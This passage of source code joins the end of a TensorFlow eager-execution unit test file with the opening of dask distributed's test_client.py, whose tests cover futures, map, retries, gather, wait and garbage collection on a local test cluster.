b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].as_cpu_tensor().numpy()
self.assertEqual(3, result)
def testCopyBetweenDevices(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.as_cpu_tensor()
x = x.as_gpu_tensor()
x = x.as_gpu_tensor()
x = x.as_cpu_tensor()
# Invalid device
with self.assertRaises(RuntimeError):
x.as_gpu_tensor(context.context().num_gpus() + 1)
def testNumpyForceCPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.as_gpu_tensor()
self.assertAllEqual(c2g.numpy(), cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.as_cpu_tensor()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta.numpy(), tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertEqual(15, product.numpy())
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
# That should be okay.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3), constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertEqual(15, product.numpy())
def testMatMulGPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
three = constant_op.constant([[3.]]).as_gpu_tensor()
five = constant_op.constant([[5.]]).as_gpu_tensor()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertEqual([[15.0]], product.numpy())
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal.numpy())
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertEqual(7, total.numpy())
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertEqual([[15]], product.numpy())
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b.numpy())
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b.numpy())
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1.numpy())
self.assertAllEqual([[1], [4]], x2.numpy())
self.assertAllEqual([[2], [5]], x3.numpy())
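# NOTE: `num_outputs` must match the number of tensors the op actually produces;
# here Split with num_split=3 yields three column slices of the 2x3 input, which
# is why the call above unpacks cleanly into x1, x2, x3.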
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertEqual(3, three_x.numpy())
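# NOTE: eager tensors returned by one `execute` call can be fed directly as
# inputs to the next, so ops compose as ordinary Python calls; add(add(x, x), x)
# above evaluates immediately to 3 rather than building a graph first.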
def testOperationWithNoInputsRunsOnDevice(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op on CPU and copy the result to GPU.
x = truncated_normal(shape).as_gpu_tensor()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
if __name__ == '__main__':
test.main()
|
test_client.py
|
import asyncio
from collections import deque
from contextlib import suppress
from functools import partial
import gc
import logging
from operator import add
import os
import pickle
import psutil
import random
import subprocess
import sys
import threading
from threading import Semaphore
from time import sleep
import traceback
import warnings
import weakref
import zipfile
import pytest
from tlz import identity, isdistinct, concat, pluck, valmap, first, merge
import dask
from dask import delayed
from dask.optimization import SubgraphCallable
import dask.bag as db
from distributed import (
Worker,
Nanny,
fire_and_forget,
LocalCluster,
get_client,
secede,
get_worker,
Executor,
profile,
performance_report,
TimeoutError,
CancelledError,
)
from distributed.comm import CommClosedError
from distributed.client import (
Client,
Future,
wait,
as_completed,
tokenize,
_get_global_client,
default_client,
futures_of,
temp_default_client,
)
from distributed.compatibility import WINDOWS
from distributed.metrics import time
from distributed.scheduler import Scheduler, KilledWorker
from distributed.sizeof import sizeof
from distributed.utils import (
mp_context,
sync,
tmp_text,
tokey,
tmpfile,
is_valid_xml,
)
from distributed.utils_test import (
cluster,
slowinc,
slowadd,
slowdec,
randominc,
inc,
dec,
div,
throws,
geninc,
asyncinc,
gen_cluster,
gen_test,
double,
popen,
captured_logger,
varying,
map_varying,
wait_for,
async_wait_for,
pristine_loop,
save_sys_modules,
)
from distributed.utils_test import ( # noqa: F401
client as c,
client_secondary as c2,
cleanup,
cluster_fixture,
loop,
loop_in_thread,
nodebug,
s,
a,
b,
)
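# NOTE: `gen_cluster` (from distributed.utils_test) appears to spin up an
# in-process scheduler plus two workers for each coroutine test; with client=True
# the test receives (c, s, a, b) = (Client, Scheduler, Worker, Worker). The
# synchronous tests below instead rely on the `c`, `loop`, and `cluster_fixture`
# pytest fixtures imported above.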
@gen_cluster(client=True, timeout=None)
async def test_submit(c, s, a, b):
x = c.submit(inc, 10)
assert not x.done()
assert isinstance(x, Future)
assert x.client is c
result = await x
assert result == 11
assert x.done()
y = c.submit(inc, 20)
z = c.submit(add, x, y)
result = await z
assert result == 11 + 21
s.validate_state()
@gen_cluster(client=True)
async def test_map(c, s, a, b):
L1 = c.map(inc, range(5))
assert len(L1) == 5
assert isdistinct(x.key for x in L1)
assert all(isinstance(x, Future) for x in L1)
result = await L1[0]
assert result == inc(0)
assert len(s.tasks) == 5
L2 = c.map(inc, L1)
result = await L2[1]
assert result == inc(inc(1))
assert len(s.tasks) == 10
# assert L1[0].key in s.tasks[L2[0].key]
total = c.submit(sum, L2)
result = await total
assert result == sum(map(inc, map(inc, range(5))))
L3 = c.map(add, L1, L2)
result = await L3[1]
assert result == inc(1) + inc(inc(1))
L4 = c.map(add, range(3), range(4))
results = await c.gather(L4)
assert results == list(map(add, range(3), range(4)))
def f(x, y=10):
return x + y
L5 = c.map(f, range(5), y=5)
results = await c.gather(L5)
assert results == list(range(5, 10))
y = c.submit(f, 10)
L6 = c.map(f, range(5), y=y)
results = await c.gather(L6)
assert results == list(range(20, 25))
s.validate_state()
@gen_cluster(client=True)
async def test_map_empty(c, s, a, b):
L1 = c.map(inc, [], pure=False)
assert len(L1) == 0
results = await c.gather(L1)
assert results == []
@gen_cluster(client=True)
async def test_map_keynames(c, s, a, b):
futures = c.map(inc, range(4), key="INC")
assert all(f.key.startswith("INC") for f in futures)
assert isdistinct(f.key for f in futures)
futures2 = c.map(inc, [5, 6, 7, 8], key="INC")
assert [f.key for f in futures] != [f.key for f in futures2]
keys = ["inc-1", "inc-2", "inc-3", "inc-4"]
futures = c.map(inc, range(4), key=keys)
assert [f.key for f in futures] == keys
@gen_cluster(client=True)
async def test_map_retries(c, s, a, b):
args = [
[ZeroDivisionError("one"), 2, 3],
[4, 5, 6],
[ZeroDivisionError("seven"), ZeroDivisionError("eight"), 9],
]
x, y, z = c.map(*map_varying(args), retries=2)
assert await x == 2
assert await y == 4
assert await z == 9
x, y, z = c.map(*map_varying(args), retries=1, pure=False)
assert await x == 2
assert await y == 4
with pytest.raises(ZeroDivisionError, match="eight"):
await z
x, y, z = c.map(*map_varying(args), retries=0, pure=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 4
with pytest.raises(ZeroDivisionError, match="seven"):
await z
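# NOTE: `varying` / `map_varying` are test helpers that seem to produce callables
# which raise or return the items of `args` in order on successive attempts, so a
# row like [ZeroDivisionError("one"), 2, 3] needs retries >= 1 before the value 2
# comes back. The assertions above and in the compute/persist retry tests below
# rely on that behaviour.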
@gen_cluster(client=True)
async def test_map_batch_size(c, s, a, b):
result = c.map(inc, range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(1, 101))
result = c.map(add, range(100), range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(0, 200, 2))
# mismatch shape
result = c.map(add, range(100, 200), range(10), batch_size=2)
result = await c.gather(result)
assert result == list(range(100, 120, 2))
@gen_cluster(client=True)
async def test_compute_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check for varying() use
x = c.compute(delayed(varying(args))())
with pytest.raises(ZeroDivisionError, match="one"):
await x
# Same retries for all
x = c.compute(delayed(varying(args))(), retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
args.append(4)
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
# Per-future retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x, y = [delayed(varying(args))() for args in (xargs, yargs)]
x, y = c.compute([x, y], retries={x: 2})
gc.collect()
assert await x == 30
with pytest.raises(ZeroDivisionError, match="five"):
await y
x, y, z = [delayed(varying(args))() for args in (xargs, yargs, zargs)]
x, y, z = c.compute([x, y, z], retries={(y, z): 2})
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
def test_retries_get(c):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
assert x.compute(retries=5) == 3
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
with pytest.raises(ZeroDivisionError):
x.compute()
@gen_cluster(client=True)
async def test_compute_persisted_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check
x = c.persist(delayed(varying(args))())
fut = c.compute(x)
with pytest.raises(ZeroDivisionError, match="one"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=2)
assert await fut == 3
args.append(4)
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=3)
assert await fut == 3
@gen_cluster(client=True)
async def test_persist_retries(c, s, a, b):
# Same retries for all
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = c.persist(delayed(varying(args))(), retries=1)
x = c.compute(x)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.persist(delayed(varying(args))(), retries=2)
x = c.compute(x)
assert await x == 3
# Per-key retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x, y, z = [delayed(varying(args))() for args in (xargs, yargs, zargs)]
x, y, z = c.persist([x, y, z], retries={(y, z): 2})
x, y, z = c.compute([x, y, z])
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
@gen_cluster(client=True)
async def test_retries_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
assert y == 100
@gen_cluster(client=True)
async def test_future_repr(c, s, a, b):
pd = pytest.importorskip("pandas")
x = c.submit(inc, 10)
y = c.submit(pd.DataFrame, {"x": [1, 2, 3]})
await x
await y
for func in [repr, lambda x: x._repr_html_()]:
assert str(x.key) in func(x)
assert str(x.status) in func(x)
assert str(x.status) in repr(c.futures[x.key])
assert "int" in func(x)
assert "pandas" in func(y)
assert "DataFrame" in func(y)
@gen_cluster(client=True)
async def test_future_tuple_repr(c, s, a, b):
da = pytest.importorskip("dask.array")
y = da.arange(10, chunks=(5,)).persist()
f = futures_of(y)[0]
for func in [repr, lambda x: x._repr_html_()]:
for k in f.key:
assert str(k) in func(f)
@gen_cluster(client=True)
async def test_Future_exception(c, s, a, b):
x = c.submit(div, 1, 0)
result = await x.exception()
assert isinstance(result, ZeroDivisionError)
x = c.submit(div, 1, 1)
result = await x.exception()
assert result is None
def test_Future_exception_sync(c):
x = c.submit(div, 1, 0)
assert isinstance(x.exception(), ZeroDivisionError)
x = c.submit(div, 1, 1)
assert x.exception() is None
@gen_cluster(client=True)
async def test_Future_release(c, s, a, b):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
await x
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(slowinc, 1, delay=0.5)
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(div, 1, 0)
await x.exception()
x.release()
await asyncio.sleep(0)
assert not c.futures
def test_Future_release_sync(c):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
x.result()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(slowinc, 1, delay=0.8)
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(div, 1, 0)
x.exception()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
def test_short_tracebacks(loop, c):
tblib = pytest.importorskip("tblib")
future = c.submit(div, 1, 0)
try:
future.result()
except Exception:
_, _, tb = sys.exc_info()
tb = tblib.Traceback(tb).to_dict()
n = 0
while tb is not None:
n += 1
tb = tb["tb_next"]
assert n < 5
@gen_cluster(client=True)
async def test_map_naming(c, s, a, b):
L1 = c.map(inc, range(5))
L2 = c.map(inc, range(5))
assert [x.key for x in L1] == [x.key for x in L2]
L3 = c.map(inc, [1, 1, 1, 1])
assert len({x._state for x in L3}) == 1
L4 = c.map(inc, [1, 1, 1, 1], pure=False)
assert len({x._state for x in L4}) == 4
@gen_cluster(client=True)
async def test_submit_naming(c, s, a, b):
a = c.submit(inc, 1)
b = c.submit(inc, 1)
assert a._state is b._state
c = c.submit(inc, 1, pure=False)
assert c.key != a.key
@gen_cluster(client=True)
async def test_exceptions(c, s, a, b):
x = c.submit(div, 1, 2)
result = await x
assert result == 1 / 2
x = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await x
x = c.submit(div, 10, 2) # continues to operate
result = await x
assert result == 10 / 2
@gen_cluster()
async def test_gc(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
await x
assert s.tasks[x.key].who_has
x.__del__()
await async_wait_for(
lambda: x.key not in s.tasks or not s.tasks[x.key].who_has, timeout=0.3
)
await c.close()
def test_thread(c):
x = c.submit(inc, 1)
assert x.result() == 2
x = c.submit(slowinc, 1, delay=0.3)
with pytest.raises(TimeoutError):
x.result(timeout=0.01)
assert x.result() == 2
def test_sync_exceptions(c):
x = c.submit(div, 10, 2)
assert x.result() == 5
y = c.submit(div, 10, 0)
try:
y.result()
assert False
except ZeroDivisionError:
pass
z = c.submit(div, 10, 5)
assert z.result() == 2
@gen_cluster(client=True)
async def test_gather(c, s, a, b):
x = c.submit(inc, 10)
y = c.submit(inc, x)
result = await c.gather(x)
assert result == 11
result = await c.gather([x])
assert result == [11]
result = await c.gather({"x": x, "y": [y]})
assert result == {"x": 11, "y": [12]}
@gen_cluster(client=True)
async def test_gather_lost(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
await a.close()
with pytest.raises(Exception):
await c.gather([x, y])
def test_gather_sync(c):
x = c.submit(inc, 1)
assert c.gather(x) == 2
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
c.gather([x, y])
[xx] = c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True)
async def test_gather_strict(c, s, a, b):
x = c.submit(div, 2, 1)
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await c.gather([x, y])
[xx] = await c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_gather_skip(c, s, a):
x = c.submit(div, 1, 0, priority=10)
y = c.submit(slowinc, 1, delay=0.5)
with captured_logger(logging.getLogger("distributed.scheduler")) as sched:
with captured_logger(logging.getLogger("distributed.client")) as client:
L = await c.gather([x, y], errors="skip")
assert L == [2]
assert not client.getvalue()
assert not sched.getvalue()
@gen_cluster(client=True)
async def test_limit_concurrent_gathering(c, s, a, b):
futures = c.map(inc, range(100))
await c.gather(futures)
assert len(a.outgoing_transfer_log) + len(b.outgoing_transfer_log) < 100
@gen_cluster(client=True, timeout=None)
async def test_get(c, s, a, b):
future = c.get({"x": (inc, 1)}, "x", sync=False)
assert isinstance(future, Future)
result = await future
assert result == 2
futures = c.get({"x": (inc, 1)}, ["x"], sync=False)
assert isinstance(futures[0], Future)
result = await c.gather(futures)
assert result == [2]
futures = c.get({}, [], sync=False)
result = await c.gather(futures)
assert result == []
result = await c.get(
{("x", 1): (inc, 1), ("x", 2): (inc, ("x", 1))}, ("x", 2), sync=False
)
assert result == 3
def test_get_sync(c):
assert c.get({"x": (inc, 1)}, "x") == 2
def test_no_future_references(c):
from weakref import WeakSet
ws = WeakSet()
futures = c.map(inc, range(10))
ws.update(futures)
del futures
import gc
gc.collect()
start = time()
while list(ws):
sleep(0.01)
assert time() < start + 2
def test_get_sync_optimize_graph_passes_through(c):
bag = db.range(10, npartitions=3).map(inc)
dask.compute(bag.sum(), optimize_graph=False)
@gen_cluster(client=True)
async def test_gather_errors(c, s, a, b):
def f(a, b):
raise TypeError
def g(a, b):
raise AttributeError
future_f = c.submit(f, 1, 2)
future_g = c.submit(g, 1, 2)
with pytest.raises(TypeError):
await c.gather(future_f)
with pytest.raises(AttributeError):
await c.gather(future_g)
await a.close()
@gen_cluster(client=True)
async def test_wait(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z])
assert done == {x, y, z}
assert not_done == set()
assert x.status == y.status == "finished"
@gen_cluster(client=True)
async def test_wait_first_completed(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z], return_when="FIRST_COMPLETED")
assert done == {z}
assert not_done == {x, y}
assert z.status == "finished"
assert x.status == "pending"
assert y.status == "pending"
@gen_cluster(client=True, timeout=2)
async def test_wait_timeout(c, s, a, b):
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
await wait(future, timeout=0.01)
def test_wait_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
done, not_done = wait([x, y])
assert done == {x, y}
assert not_done == set()
assert x.status == y.status == "finished"
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
wait(future, timeout=0.01)
def test_wait_informative_error_for_timeouts(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
try:
wait(x, y)
except Exception as e:
assert "timeout" in str(e)
assert "list" in str(e)
@gen_cluster(client=True)
async def test_garbage_collection(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
assert c.refcount[x.key] == 2
x.__del__()
await asyncio.sleep(0)
assert c.refcount[x.key] == 1
z = c.submit(inc, y)
y.__del__()
await asyncio.sleep(0)
result = await z
assert result == 3
ykey = y.key
y.__del__()
await asyncio.sleep(0)
assert ykey not in c.futures
@gen_cluster(client=True)
async def test_garbage_collection_with_scatter(c, s, a, b):
[future] = await c.scatter([1])
assert future.key in c.futures
assert future.status == "finished"
assert s.who_wants[future.key] == {c.id}
key = future.key
assert c.refcount[key] == 1
future.__del__()
await asyncio.sleep(0)
assert c.refcount[key] == 0
start = time()
while True:
if key not in s.tasks or not s.tasks[key].who_has:
break
else:
assert time() < start + 3
await asyncio.sleep(0.1)
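# NOTE: the client keeps a per-key reference count (c.refcount); once the last
# Future for a key is garbage collected the client releases the key and the
# scheduler eventually drops it from s.tasks / who_has, which is what the polling
# loop above waits for.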
@gen_cluster(timeout=1000, client=True)
async def test_recompute_released_key(c, s, a, b):
x = c.submit(inc, 100)
result1 = await x
xkey = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert c.refcount[xkey] == 0
# 1 second batching needs a second action to trigger
while xkey in s.tasks and s.tasks[xkey].who_has or xkey in a.data or xkey in b.data:
await asyncio.sleep(0.1)
x = c.submit(inc, 100)
assert x.key in c.futures
result2 = await x
assert result1 == result2
@pytest.mark.slow
@gen_cluster(client=True)
async def test_long_tasks_dont_trigger_timeout(c, s, a, b):
from time import sleep
x = c.submit(sleep, 3)
await x
@pytest.mark.skip
@gen_cluster(client=True)
async def test_missing_data_heals(c, s, a, b):
a.validate = False
b.validate = False
x = c.submit(inc, 1)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([x, y, z])
# Secretly delete y's key
if y.key in a.data:
del a.data[y.key]
a.release_key(y.key)
if y.key in b.data:
del b.data[y.key]
b.release_key(y.key)
await asyncio.sleep(0)
w = c.submit(add, y, z)
result = await w
assert result == 3 + 4
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_missing_data(c, s, a, b):
a.validate = False
b.validate = False
x, y, z = c.map(inc, range(3))
await wait([x, y, z]) # everything computed
for f in [x, y]:
for w in [a, b]:
if f.key in w.data:
del w.data[f.key]
await asyncio.sleep(0)
w.release_key(f.key)
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_nested_missing_data(c, s, a, b):
a.validate = False
b.validate = False
w = c.submit(inc, 1)
x = c.submit(inc, w)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([z])
for worker in [a, b]:
for datum in [y, z]:
if datum.key in worker.data:
del worker.data[datum.key]
await asyncio.sleep(0)
worker.release_key(datum.key)
result = await c.gather([z])
assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(client=True)
async def test_tokenize_on_futures(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
tok = tokenize(x)
assert tokenize(x) == tokenize(x)
assert tokenize(x) == tokenize(y)
c.futures[x.key].finish()
assert tok == tokenize(y)
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_submit(c, s, a, b):
x = c.submit(inc, 1, workers={a.ip})
y = c.submit(inc, x, workers={b.ip})
await wait([x, y])
assert s.host_restrictions[x.key] == {a.ip}
assert x.key in a.data
assert s.host_restrictions[y.key] == {b.ip}
assert y.key in b.data
@gen_cluster(client=True)
async def test_restrictions_ip_port(c, s, a, b):
x = c.submit(inc, 1, workers={a.address})
y = c.submit(inc, x, workers={b.address})
await wait([x, y])
assert s.worker_restrictions[x.key] == {a.address}
assert x.key in a.data
assert s.worker_restrictions[y.key] == {b.address}
assert y.key in b.data
@gen_cluster(client=True)
async def test_restrictions_ip_port_task_key(c, s, a, b):
# Create a long dependency list
tasks = [delayed(inc)(1)]
for _ in range(100):
tasks.append(delayed(add)(tasks[-1], random.choice(tasks)))
last_task = tasks[-1]
# calculate all dependency keys
all_tasks = list(last_task.__dask_graph__())
# only restrict to a single worker
